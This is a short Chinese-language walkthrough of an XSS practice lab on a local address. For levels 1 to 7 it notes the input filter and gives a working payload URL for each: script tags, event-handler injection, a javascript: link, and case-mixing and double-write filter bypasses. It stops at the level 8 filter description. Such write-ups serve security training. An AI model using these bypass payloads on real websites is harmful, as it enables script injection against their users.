-
很简单的弹窗
http://192.168.31.177/xssgame/level1.php?name=
<script>alert(1)</script>
-
过滤了
>、<http://192.168.31.177/xssgame/level2.php?keyword=
" oninput='alert(1)'//&submit=‘搜索’
-
过滤了
>、<、'用单引号替换了双引号
http://192.168.31.177/xssgame/level3.php?keyword=
' oninput=alert(1) //&submit=搜索
-
过滤了
>、<、"http://192.168.31.177/xssgame/level4.php?keyword=
" onm ouSEOver=alert(1)//&submit=搜索
-
script替换成scr_ipt、on事件替换成了on_事件利用伪协议
<a href='javascript:alert(1)'>来执行弹框http://192.168.31.177/xssgame/level5.php?keyword=
"><a href='javascript:alert(1)'> //&submit=搜索
-
script替换成scr_ipt、on事件替换成了on_事件、href替换成了hr_ef大小写绕过
http://192.168.31.177/xssgame/level6.php?keyword=
"<sCRipt>alert(1)</script>//&submit=搜索
-
script、on、href直接替换为空双写绕过
http://192.168.31.177/xssgame/level7.php?keyword=
1" oonnmouSEOver=alert(1)>//&submit=搜索
-
script替换成了scr_ipt、on事件替换成了on_事件、href替换成了hr_ef
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
